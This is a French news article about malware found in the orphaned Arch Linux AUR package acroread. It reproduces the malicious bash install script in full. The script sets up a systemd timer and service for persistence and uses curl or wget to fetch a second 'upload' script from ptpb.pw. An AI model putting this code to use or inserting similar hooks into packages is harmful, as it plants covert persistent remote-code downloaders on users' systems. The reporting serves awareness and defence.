Le signalement est de l’utilisateur Queen Wenceslas qui a attiré l’attention de la communauté sur un commit proposé sur le dépôt spécial AUR d’Arch Linux il y a quelques jours. Le maliciel a été éjecté grâce à l’intervention de l’équipe en charge de ce dernier.Pour bien comprendre pourquoi un incident de ce type peut se produire, il faut souligner que dans l’écosystème Arch Linux, chaque utilisateur a la possibilité de prendre le contrôle d’un paquetage sans mainteneur actif. C’est ce qui s’est produit ce weekend lorsque l’utilisateur « xreactor » est passé à l’action sur le package acroread qui, comme son nom laisse filtrer, sert de visionneuse de fichiers pdf. Au sein du commit, un script curl monté de sorte à provoquer le téléchargement d’ un certain fichier « ~x » à partir du site ptpb.pw. La manœuvre permet d’installer (sur le poste de la victime) un logiciel qui reconfigure systemd pour provoquer l’exécution d’un autre script au sein du fichier « ~x » de façon périodique. Le détail dans le code source du fichier « ~x » :
| Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | #!/bin/bash
# get to the right location
if [[ -n "$pkgdir" ]]; then
cd "$pkgdir"
else
exit 0
fi
be_silent() {
"$@" >/dev/null 2>&1
}
# systemd files
SYSTEMD_TIMER="[Timer]
OnCalendar=4d
Persistent=true
OnActiveSec=360
[Install]
WantedBy=timers.target"
SYSTEMD_SERVICE="[Unit]
Type=simple
ExecStart=/usr/lib/xeactor/u.sh"
# write systemd files
mkdir -p usr/lib/systemd/system
mkdir -p etc/systemd/system/multi-user.target.wants
echo "$SYSTEMD_SERVICE" > usr/lib/systemd/system/xeactor.service
echo "$SYSTEMD_TIMER" > usr/lib/systemd/system/xeactor.timer
ln -s /usr/lib/systemd/system/xeactor.timer etc/systemd/system/multi-user.target.wants/xeactor.timer
# get the upload script
mkdir -p usr/lib/xeactor
if be_silent which curl; then
curl -s https://ptpb.pw/~u > usr/lib/xeactor/u.sh
elif be_silent which wget; then
wget -qOusr/lib/xeactor/u.sh https://ptpb.pw/~u
else
exit 0
fi |
Attention, ne pas confondre le dépôt AUR avec le dépôt officiel Arch Build System (ABS). Les utilisateurs de tous bords sont les auteurs des paquetages disponibles au sein du premier tandis que le second tire ses contenus de sources fiables. D’ailleurs, l’équipe Arch Linux déconseille de procéder à l’installation d’un paquetage issu de l’AUR sans l’avoir passé au peigne fin.
Ce type d’incident n’est pas l’apanage de la distribution Arch Linux. En mai, des utilisateurs ont découvert un mineur de monnaie cryptographique logé au sein de l’Ubuntu Snap Store.
Sources : commit, signalement, sensortech
Et vous ?
De quelles précautions vous entourez-vous lorsque vous téléchargez des contenus de dépôts similaires ?Voir aussi :
Arch Linux annonce la fin du support de l'architecture 32 bits, un fork voit le jour pour continuer à offrir l'OS sur les PC 32 bits DistroWatch compare les rangs occupés par les distributions Linux, en 10 ans les ténors sont là, Quelle est votre distribution préférée en 2016 ? Quelles sont vos distributions Linux préférées ? Et pour quelles utilisations ? Merci de partager votre expérience avec les distributions Linux Linux : bientôt la fin du support de matériel 32 bits ? Ubuntu Desktop et Server pourraient ne plus proposer d'images 32 bits dès octobre 2016